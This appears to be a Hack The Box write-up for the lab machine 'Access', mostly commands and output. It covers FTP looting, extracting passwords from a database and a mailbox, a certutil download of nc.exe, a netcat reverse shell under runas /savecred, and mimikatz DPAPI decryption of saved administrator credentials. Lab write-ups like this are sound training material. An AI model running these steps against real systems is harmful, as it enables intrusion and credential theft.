Access
Contents
Ports Scan
root@kali:~# masscan -e tun0 -p1-65535,U:1-65535 10.10.10.98 --rate=1000
Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-01-22 14:06:32 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 21/tcp on 10.10.10.98 Discovered open port 23/tcp on 10.10.10.98 Discovered open port 80/tcp on 10.10.10.98
root@kali:~/HTB/Machines/Access# nmap -sC -sV 10.10.10.98 Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-22 09:07 EST Nmap scan report for access.htb (10.10.10.98) Host is up (0.045s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_Can't get directory listing: PASV failed: 425 Cannot open data connection. | ftp-syst: |_ SYST: Windows_NT 23/tcp open telnet? 80/tcp open http Microsoft IIS httpd 7.5 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/7.5 |_http-title: MegaCorp Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 183.22 seconds
Web enumeration
The web enumeration only provides useless information (only index.html)
u505@kali:~/HTB/Machines/Access$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e "asax,ascx,ashx,asmx,aspx,axd,browser,cd,compile,config,cs,vb,csproj,vbproj,disco,vsdisco,dsdgm,dsprototype,dll,licx,webinfo,master,mdb,ldb,mdf,msgx,svc,resources,resx,sdm,sdmDocument,sitemap,skin,sln,soap,asa,cdx,cer,idc,shtm,shtml,stm,css,htm,html,jpg,jpeg,png,tiff,bmp,svg,gif,ico,tga,xcf,dwg,pdf" -f -t 1000 -u http://10.10.10.98
_|. _ _ _ _ _ _|_ v0.3.9 (_||| _) (/_(_|| (_| ) Extensions: asax, ascx, ashx, asmx, aspx, axd, browser, cd, compile, config, cs, vb, csproj, vbproj, disco, vsdisco, dsdgm, dsprototype, dll, licx, webinfo, master, mdb, ldb, mdf, msgx, svc, resources, resx, sdm, sdmDocument, sitemap, skin, sln, soap, asa, cdx, cer, idc, shtm, shtml, stm, css, htm, html, jpg, jpeg, png, tiff, bmp, svg, gif, ico, tga, xcf, dwg, pdf | HTTP method: get | Threads: 1000 | Wordlist size: 12790217 Error Log: /opt/utils/dirsearch/logs/errors-20-02-11_21-09-08.log Target: http://10.10.10.98 [21:09:08] Starting: [21:09:16] 200 - 391B - /index.html [21:10:34] 200 - 87KB - /out.jpg [21:10:41] 200 - 391B - /Index.html [21:11:13] 403 - 2KB - /trace.axd [21:20:48] 200 - 391B - /INDEX.html [22:44:04] 403 - 2KB - /Trace.axd
Ftp
The ftp server contain interresting files
u505@kali:~/HTB/Machines/Access$ ftp access Connected to access.htb. 220 Microsoft FTP Service Name (access:u505): anonymous 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 User logged in. Remote system type is Windows_NT. ftp> dir 200 PORT command successful. 125 Data connection already open; Transfer starting. 08-23-18 08:16PM <DIR> Backups 08-24-18 09:00PM <DIR> Engineer 226 Transfer complete. ftp> cd Backups 250 CWD command successful. ftp> dir 200 PORT command successful. 125 Data connection already open; Transfer starting. 08-23-18 08:16PM 5652480 backup.mdb 226 Transfer complete. ftp> bin 200 Type set to I. ftp> get backup.mdb local: backup.mdb remote: backup.mdb 200 PORT command successful. 125 Data connection already open; Transfer starting. 226 Transfer complete. 5652480 bytes received in 3.97 secs (1.3588 MB/s) ftp> cd ../Engineer 250 CWD command successful. ftp> dir 200 PORT command successful. 125 Data connection already open; Transfer starting. 08-24-18 12:16AM 10870 Access Control.zip 226 Transfer complete. ftp> get "Access Control.zip" local: Access Control.zip remote: Access Control.zip 200 PORT command successful. 125 Data connection already open; Transfer starting. 226 Transfer complete. 10870 bytes received in 0.22 secs (48.9563 kB/s) ftp> quit 221 Goodbye.
Unzip Access Control.zip
u505@kali:~/HTB/Machines/Access$ 7z x "Access Control.zip"
7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21 p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,8 CPUs Intel(R) Core(TM) i7-6700HQ CPU @ 2.60GHz (506E3),ASM,AES-NI)
Scanning the drive for archives: 1 file, 10870 bytes (11 KiB)
Extracting archive: Access Control.zip -- Path = Access Control.zip Type = zip Physical Size = 10870
Enter password (will not be echoed): ERROR: Wrong password : Access Control.pst
Sub items Errors: 1
Archives with Errors: 1
Sub items Errors: 1
The file is encrypted.
Brute force
We create the hash file for john
u505@kali:~/HTB/Machines/Access$ zip2john Access\ Control.zip > ziphash.txt ver 2.0 Access Control.zip/Access Control.pst PKZIP Encr: cmplen=10678, decmplen=271360, crc=1D60603C
And try to crack it. But john fails to crack the password.
u505@kali:~/HTB/Machines/Access$ john --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt ziphash.txt Using default input encoding: UTF-8 Loaded 1 password hash (ZIP, WinZip [PBKDF2-SHA1 256/256 AVX2 8x]) Will run 8 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status 0g 0:00:03:34 DONE (2020-02-11 21:29) 0g/s 66823p/s 66823c/s 66823C/s "chido"..*7¡Vamos! Session completed
Analyze the backup.mdb
With the application mdb-tables and mdb-export we extract the information from the access file.
u505@kali:~/HTB/Machines/Access/work$ cat extract.sh tables=`mdb-tables backup.mdb` for table in $tables do echo "---------------------------$table--------------------------------" mdb-export backup.mdb $table done
Running the script exports all the information.
u505@kali:~/HTB/Machines/Access/work$ ./extract.sh > export
Diving into the exported file, we find a password.
u505@kali:~/HTB/Machines/Access/work$ grep -n password export -A5
104:id,username,password,Status,last_login,RoleID,Remark
105-25,"admin","admin",1,"08/23/18 21:11:47",26,
106-27,"engineer","access4u@security",1,"08/23/18 21:13:36",26,
107-28,"backup_admin","admin",1,"08/23/18 21:14:02",26,
108----------------------------auth_user_groups--------------------------------
109-id,user_id,group_id
Use password with zip file
u505@kali:~/HTB/Machines/Access$ 7z x "Access Control.zip"
7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21 p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,8 CPUs Intel(R) Core(TM) i7-6700HQ CPU @ 2.60GHz (506E3),ASM,AES-NI)
Scanning the drive for archives: 1 file, 10870 bytes (11 KiB)
Extracting archive: Access Control.zip -- Path = Access Control.zip Type = zip Physical Size = 10870
Enter password (will not be echoed): Everything is Ok
Size: 271360 Compressed: 10870
The pst file is decrypted.
u505@kali:~/HTB/Machines/Access$ ls -l "Access Control.pst"
-rw-r--r-- 1 u505 u505 271360 Aug 23 2018 'Access Control.pst'
Read pst file
With the application MailStore, pst files can be opened.
The outlook pst file contains an email with the password for the user security.
An alternative is to use the command readpst
u505@kali:~/HTB/Machines/Access$ mkdir mails
u505@kali:~/HTB/Machines/Access$ readpst "Access_Control.pst" -o mails/
Opening PST file and indexes...
Processing Folder "Deleted Items"
"Access Control" - 2 items done, 0 items skipped.
And open the mbox file with mutt
u505@kali:~/HTB/Machines/Access/mails$ mutt -f "Access Control.mbox" i:Exit -:PrevPg <Space>:NextPg v:View Attachm. d:Del r:Reply j:Next ?:Help Date: Thu, 23 Aug 2018 23:44:07 +0000 From: "john@megacorp.com" <john@megacorp.com> To: 'security@accesscontrolsystems.com' Subject: MegaCorp Access Control System "security" account
[-- Attachment #1 --] [-- Type: multipart/alternative, Encoding: 7bit, Size: 2.5K --]
Hi there,
The password for the “security” account has been changed to 4Cc3ssC0ntr0ller. +Please ensure this is passed on to your engineers.
Regards,
John
- - 1/1: john@megacorp.com MegaCorp Access Control System "secur -- (all) Mailbox is unchanged. u505@kali:~/HTB/Machines/Access/mails$
User flag
With the user security and password we can login in a telnet session, and obtain the user flag.
u505@kali:~/HTB/Machines/Access/mails$ telnet access Trying 10.10.10.98... Connected to access.htb. Escape character is '^]'. Welcome to Microsoft Telnet Service
login: security password:
*=============================================================== Microsoft Telnet Server. *=============================================================== C:\Users\security>cd Desktop
C:\Users\security\Desktop>type user.txt <USER_FLAG>
User escalation
Consult
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md or cat /usr/share/payloadsallthethings/Methodology and Resources/Windows - Privilege Escalation.md
EoP - Runas
C:\Users\security>cmdkey /list Currently stored credentials: Target: Domain:interactive=ACCESS\Administrator Type: Domain Password User: ACCESS\Administrator
Then you can use runas with the /savecred options in order to use the saved credentials.
An alternative way to find that stored credentials exists is looking on this shortcut.
C:\Users\Public\Desktop>type "ZKAccess3.5 Security System.lnk"
L▒F▒@ ▒7▒▒7▒▒▒#▒P/P▒O▒ ▒:i▒+00▒/C:\R1M▒:Windows▒▒:▒M▒:*wWindowsV1MV▒System32▒▒:▒MV▒*▒System32X2P▒:▒
runas.exe▒▒:1▒▒:1▒*Yrunas.exeL-K▒▒E▒C:\Windows\System32\runas.exe#..\..\..\Windows\System32\runas.exeC:\ZKTeco\ZKAccess3.5G/user:ACCESS\Administrator /savecred
"C:\ZKTeco\ZKAccess3.5\Access.exe"'C:\ZKTeco\ZKAccess3.5\img\AccessNET.ico▒%SystemDrive%\ZKTeco\ZKAccess3.5\img\AccessNET.ico%SystemDrive%\ZKTeco\ZKAccess3.5\img\AccessNET.ico▒%▒
▒wN▒▒]N▒D.▒▒Q▒▒▒`▒Xaccess▒_▒▒8{E▒3
O▒j)H▒▒▒
)ΰ[▒_▒▒8{E▒3
O▒j)H▒▒▒
)ΰ[▒ ▒▒1SPS▒XF▒L8C▒▒▒&▒m▒e*S-1-5-21-953262931-566350628-63446256-500
C:\Users\Public\Desktop>
Upload nc.exe
Turn on the web server to download nc.exe to the target
u505@kali:~/HTB/Machines/Access$ mkdir www u505@kali:~/HTB/Machines/Access$ cd www/ u505@kali:~/HTB/Machines/Access/www$ cp /usr/share/windows-resources/binaries/nc.exe ./ u505@kali:~/HTB/Machines/Access/www$ sudo python -m SimpleHTTPServer 80 [sudo] password for u505: Serving HTTP on 0.0.0.0 port 80 ...
From the target
C:\Users\security>certutil -urlcache -split -f "http://10.10.14.26/nc.exe" nc.exe **** Online **** 0000 ... e800 CertUtil: -URLCache command completed successfully.
Reverse shell
Raise of the listener
u505@kali:~/HTB/Machines/Access/www$ rlwrap nc -nlvp 4444 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444
If we try without runas we have a group policy limitation on user security
C:\Users\security>nc.exe -e cmd 10.10.14.26 4444 This program is blocked by group policy. For more information, contact your system administrator.
But if we run as administrator there is no limitation.
C:\Users\security>runas /user:ACCESS\administrator /savedcred "nc.exe -e cmd 10.10.14.26 4444"
And a reverse shell opens in our listener
u505@kali:~/HTB/Machines/Access/www$ rlwrap nc -nlvp 4444 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444 Ncat: Connection from 10.10.10.98. Ncat: Connection from 10.10.10.98:49170. Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami whoami access\administrator
Root flag
C:\Windows\system32>cd c:\users\Administrator\Desktop cd c:\users\Administrator\Desktop
c:\Users\Administrator\Desktop>type root.txt type root.txt <ROOT_FLAG>
Crack Administrator credentials
Obtain files from target machine
Administrator credentials are stored in the profile of the user security. We can crack them with mimikatz.
The master key of the user security allows to decrypt the administartor credentials stored.
Master key: C:\Users\security>dir /a C:\Users\security\AppData\Roaming\Microsoft\Protect\S-1-5-21-953262931-566350628-63446256-1001 Volume in drive C has no label. Volume Serial Number is 9C45-DBF0
Directory of C:\Users\security\AppData\Roaming\Microsoft\Protect\S-1-5-21-953262931-566350628-63446256-1001
08/22/2018 09:18 PM <DIR> . 08/22/2018 09:18 PM <DIR> .. 08/22/2018 09:18 PM 468 0792c32e-48a5-4fe3-8b43-d93d64590580 08/22/2018 09:18 PM 24 Preferred 2 File(s) 492 bytes 2 Dir(s) 16,771,567,616 bytes free
Administrator Credentials: C:\Users\security>dir /a C:\Users\security\AppData\Roaming\Microsoft\Credentials Volume in drive C has no label. Volume Serial Number is 9C45-DBF0
Directory of C:\Users\security\AppData\Roaming\Microsoft\Credentials
01/22/2020 08:33 PM <DIR> . 01/22/2020 08:33 PM <DIR> .. 08/22/2018 09:18 PM 538 51AB168BE4BDB3A603DADE4F8CA81290 01/22/2020 08:33 PM 0 cd 2 File(s) 538 bytes 2 Dir(s) 16,771,567,616 bytes free
The easiest way to transfer the master key and the encrypted credentials is to transform them to base64 and simply copy them. We can use certutil to encode the files.
C:\Users\security>certutil -encode C:\Users\security\AppData\Roaming\Microsoft\Protect\S-1-5-21-953262931-566350628-63446256-1001\0792c32e-48a5-4fe3-8b43-d93d64590580 0792c32e-48a5-4fe3-8b43-d93d64590580.b64 Input Length = 468 Output Length = 700 CertUtil: -encode command completed successfully.
C:\Users\security>certutil -encode C:\Users\security\AppData\Roaming\Microsoft\Credentials\51AB168BE4BDB3A603DADE4F8CA81290 51AB168BE4BDB3A603DADE4F8CA81290.b64 Input Length = 538 Output Length = 800 CertUtil: -encode command completed successfully.
C:\Users\security>type *.b64
0792c32e-48a5-4fe3-8b43-d93d64590580.b64
-----BEGIN CERTIFICATE----- AgAAAAAAAAAAAAAAMAA3ADkAMgBjADMAMgBlAC0ANAA4AGEANQAtADQAZgBlADMA LQA4AGIANAAzAC0AZAA5ADMAZAA2ADQANQA5ADAANQA4ADAAAAAAAAAAAAAFAAAA sAAAAAAAAACQAAAAAAAAABQAAAAAAAAAAAAAAAAAAAACAAAAnFHKTQBwjHPU+/9g uV5UnvhDAAAOgAAAEGYAAOePsdmJxMzXoFKFwX+uHDGtEhD3raBRrjIDU232E+Y6 DkZHyp7VFAdjfYwcwq0WsjBqq1bX0nB7DHdCLn3jnri9/MpVBEtKf4U7bwszMyE7 Ww2Ax8ECH2xKwvX6N3KtvlCvf98HsODqlA1woSRdt9+Ef2FVMKk4lQEqOtnHqMOc wFktBtcUye6P40ztUGLEEgIAAABLtt2bW5ZW2Xt48RR5ZFf0+EMAAA6AAAAQZgAA D+azql3Tr0a9eofLwBYfxBrhP4cUoivLW9qG8k2VrQM2mlM1FZGF0CdnQ9DBEys1 /a/60kfTxPX0MmBBPCi0Ae1w5C4BhPnoxGaKvDbrcye9LHN0ojgbTN1Op8Rl3qp1 Xg9TZyRzkA24hotCgyftqgMAAADlaJYABZMbQLoN36DhGzTQ -----END CERTIFICATE-----
51AB168BE4BDB3A603DADE4F8CA81290.b64
-----BEGIN CERTIFICATE----- AQAAAA4CAAAAAAAAAQAAANCMnd8BFdERjHoAwE/Cl+sBAAAALsOSB6VI40+LQ9k9 ZFkFgAAAACA6AAAARQBuAHQAZQByAHAAcgBpAHMAZQAgAEMAcgBlAGQAZQBuAHQA aQBhAGwAIABEAGEAdABhAA0ACgAAABBmAAAAAQAAIAAAAPW7usJAvZDZr308LPt/ MB8fEjrJTQejzAEgOBNfpaa8AAAAAA6AAAAAAgAAIAAAAPlkLTI/rjZqT3KT0C8m 5Ecq3DKwC6xqBhkURY2t/T5SAAEAAOc1Qv9x0IUp+dpf+I7c1b5E0RycAsRf39nu WlMWKMsPno3CIetbTYOoV6/xNHMTHJJ1JyF/4XfgjWOmPrXOU0FXazMzKAbgYjY+ WHhvt1Uaqi4GdrjjlX9Dzx8Rou0UnEMRBOX5PyA2SRbfJaAWjt4jeIvZ1xGSzbZh xcVobtJWyGkQV/5v4qKxdlugl57pFAwBAhDuqBrACDD3TDWhlqwfRr1p16hsqC2h X5u88cQMu+QdWNSokkr96X4qmabp8zopfvJQhAHCKaRRuRHpRpuhfXEojcbDfuJs ZezIrM1LWzwMLM/K5rCnY4Sg4nxO23oOzs4q/ZiJJSME21dnu8NAAAAAY/zBU7zW C+/QdKUJjqDlUviAlWLFU5hbqocgqCjmHgW9XRy4IAcRVRoQDtO4U1mLOHW6kLaJ vEgzQvv2cbicmQ== -----END CERTIFICATE-----
Obtain SID of ACCESS\security
C:\Users\security>whoami /user
USER INFORMATION ----------------
User Name SID =============== ========================================== access\security S-1-5-21-953262931-566350628-63446256-1001
Copy and decode files
On our machine, we copy and decode the 2 files
u505@kali:~/HTB/Machines/Access$ vi 0792c32e-48a5-4fe3-8b43-d93d64590580.b64 u505@kali:~/HTB/Machines/Access$ vi 51AB168BE4BDB3A603DADE4F8CA81290.b64 u505@kali:~/HTB/Machines/Access$ base64 -d 0792c32e-48a5-4fe3-8b43-d93d64590580.b64 > 0792c32e-48a5-4fe3-8b43-d93d64590580 u505@kali:~/HTB/Machines/Access$ base64 -d 51AB168BE4BDB3A603DADE4F8CA81290.b64 > 51AB168BE4BDB3A603DADE4F8CA81290
And we transfer these files to our windows machine with mimikatz installed.
Mimikatz
First, we load the master key in memory
.#####. mimikatz 2.2.0 (x64) #18362 Jan 4 2020 18:59:26 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > http://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz # dpapi::masterkey /in:C:\Users\u505\Desktop\Access\0792c32e-48a5-4fe3-8b43-d93d64590580 /sid:S-1-5-21-953262931-566350628-63446256-1001 /password:4Cc3ssC0ntr0ller **MASTERKEYS** dwVersion : 00000002 - 2 szGuid : {0792c32e-48a5-4fe3-8b43-d93d64590580} dwFlags : 00000005 - 5 dwMasterKeyLen : 000000b0 - 176 dwBackupKeyLen : 00000090 - 144 dwCredHistLen : 00000014 - 20 dwDomainKeyLen : 00000000 - 0 [masterkey] **MASTERKEY** dwVersion : 00000002 - 2 salt : 9c51ca4d00708c73d4fbff60b95e549e rounds : 000043f8 - 17400 algHash : 0000800e - 32782 (CALG_SHA_512) algCrypt : 00006610 - 26128 (CALG_AES_256) pbKey : e78fb1d989c4ccd7a05285c17fae1c31ad1210f7ada051ae3203536df613e63a0e4647ca9ed51407637d8c1cc2ad16b2306aab56d7d2707b0c77422e7de39eb8bdfcca55044b4a7f853b6f0b3333213b5b0d80c7c1021f6c4ac2f5fa3772adbe50af7fdf07b0e0ea940d70a1245db7df847f615530a93895012a3ad9c7a8c39cc0592d06d714c9ee8fe34ced5062c412
[backupkey] **MASTERKEY** dwVersion : 00000002 - 2 salt : 4bb6dd9b5b9656d97b78f114796457f4 rounds : 000043f8 - 17400 algHash : 0000800e - 32782 (CALG_SHA_512) algCrypt : 00006610 - 26128 (CALG_AES_256) pbKey : 0fe6b3aa5dd3af46bd7a87cbc0161fc41ae13f8714a22bcb5bda86f24d95ad03369a5335159185d0276743d0c1132b35fdaffad247d3c4f5f43260413c28b401ed70e42e0184f9e8c4668abc36eb7327bd2c7374a2381b4cdd4ea7c465deaa755e0f53672473900db8868b428327edaa
[credhist] **CREDHIST INFO** dwVersion : 00000003 - 3 guid : {009668e5-9305-401b-ba0d-dfa0e11b34d0}
[masterkey] with password: 4Cc3ssC0ntr0ller (normal user) key : b360fa5dfea278892070f4d086d47ccf5ae30f7206af0927c33b13957d44f0149a128391c4344a9b7b9c9e2e5351bfaf94a1a715627f27ec9fafb17f9b4af7d2 sha1: bf6d0654ef999c3ad5b09692944da3c0d0b68afe
Check the cache
mimikatz # dpapi::cache
CREDENTIALS cache ================= SID:S-1-5-21-953262931-566350628-63446256-1001;GUID:{009668e5-9305-401b-ba0d-dfa0e11b34d0};MD4:b41db16a61cb04b231625de260163015;SHA1:75f1e3aa023a0f57d4225f3ab4f18f6fea025414;
MASTERKEYS cache ================ GUID:{0792c32e-48a5-4fe3-8b43-d93d64590580};KeyHash:bf6d0654ef999c3ad5b09692944da3c0d0b68afe
DOMAINKEYS cache ================
Decrypt the adminsitrator credentials
mimikatz # dpapi::cred /in:C:\Users\u505\Desktop\Access\51AB168BE4BDB3A603DADE4F8CA81290
**BLOB**
dwVersion : 00000001 - 1
guidProvider : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
dwMasterKeyVersion : 00000001 - 1
guidMasterKey : {0792c32e-48a5-4fe3-8b43-d93d64590580}
dwFlags : 20000000 - 536870912 (system ; )
dwDescriptionLen : 0000003a - 58
szDescription : Enterprise Credential Data
algCrypt : 00006610 - 26128 (CALG_AES_256)
dwAlgCryptLen : 00000100 - 256
dwSaltLen : 00000020 - 32
pbSalt : f5bbbac240bd90d9af7d3c2cfb7f301f1f123ac94d07a3cc012038135fa5a6bc
dwHmacKeyLen : 00000000 - 0
pbHmackKey :
algHash : 0000800e - 32782 (CALG_SHA_512)
dwAlgHashLen : 00000200 - 512
dwHmac2KeyLen : 00000020 - 32
pbHmack2Key : f9642d323fae366a4f7293d02f26e4472adc32b00bac6a061914458dadfd3e52
dwDataLen : 00000100 - 256
pbData : e73542ff71d08529f9da5ff88edcd5be44d11c9c02c45fdfd9ee5a531628cb0f9e8dc221eb5b4d83a857aff13473131c927527217fe177e08d63a63eb5ce5341576b33332806e062363e58786fb7551aaa2e0676b8e3957f43cf1f11a2ed149c431104e5f93f20364916df25a0168ede23788bd9d71192cdb661c5c5686ed256c8691057fe6fe2a2b1765ba0979ee9140c010210eea81ac00830f74c35a196ac1f46bd69d7a86ca82da15f9bbcf1c40cbbe41d58d4a8924afde97e2a99a6e9f33a297ef2508401c229a451b911e9469ba17d71288dc6c37ee26c65ecc8accd4b5b3c0c2ccfcae6b0a76384a0e27c4edb7a0ecece2afd9889252304db5767bbc3
dwSignLen : 00000040 - 64
pbSign : 63fcc153bcd60befd074a5098ea0e552f8809562c553985baa8720a828e61e05bd5d1cb8200711551a100ed3b853598b3875ba90b689bc483342fbf671b89c99
Decrypting Credential:
* volatile cache: GUID:{0792c32e-48a5-4fe3-8b43-d93d64590580};KeyHash:bf6d0654ef999c3ad5b09692944da3c0d0b68afe
**CREDENTIAL**
credFlags : 00000030 - 48
credSize : 000000f4 - 244
credUnk0 : 00002004 - 8196
Type : 00000002 - 2 - domain_password
Flags : 00000000 - 0
LastWritten : 8/22/2018 21:18:49
unkFlagsOrSize : 00000038 - 56
Persist : 00000003 - 3 - enterprise
AttributeCount : 00000000 - 0
unk0 : 00000000 - 0
unk1 : 00000000 - 0
TargetName : Domain:interactive=ACCESS\Administrator
UnkData : (null)
Comment : (null)
TargetAlias : (null)
UserName : ACCESS\Administrator
CredentialBlob : 55Acc3ssS3cur1ty@megacorp
Attributes : 0
Access system
We can telnet
u505@kali:~/HTB/Machines/Access/mails$ telnet access Trying 10.10.10.98... Connected to access.htb. Escape character is '^]'. Welcome to Microsoft Telnet Service
login: administrator password:
*=============================================================== Microsoft Telnet Server. *=============================================================== C:\Users\Administrator>whoami access\administrator
References
- How to crack protected zip files using John the Ripper (JTR) in Kali
- JAWS - Just Another Windows (Enum) Script
- Windows - Privilege Escalation
Daniel Simao 09:04, 22 January 2020 (EST)
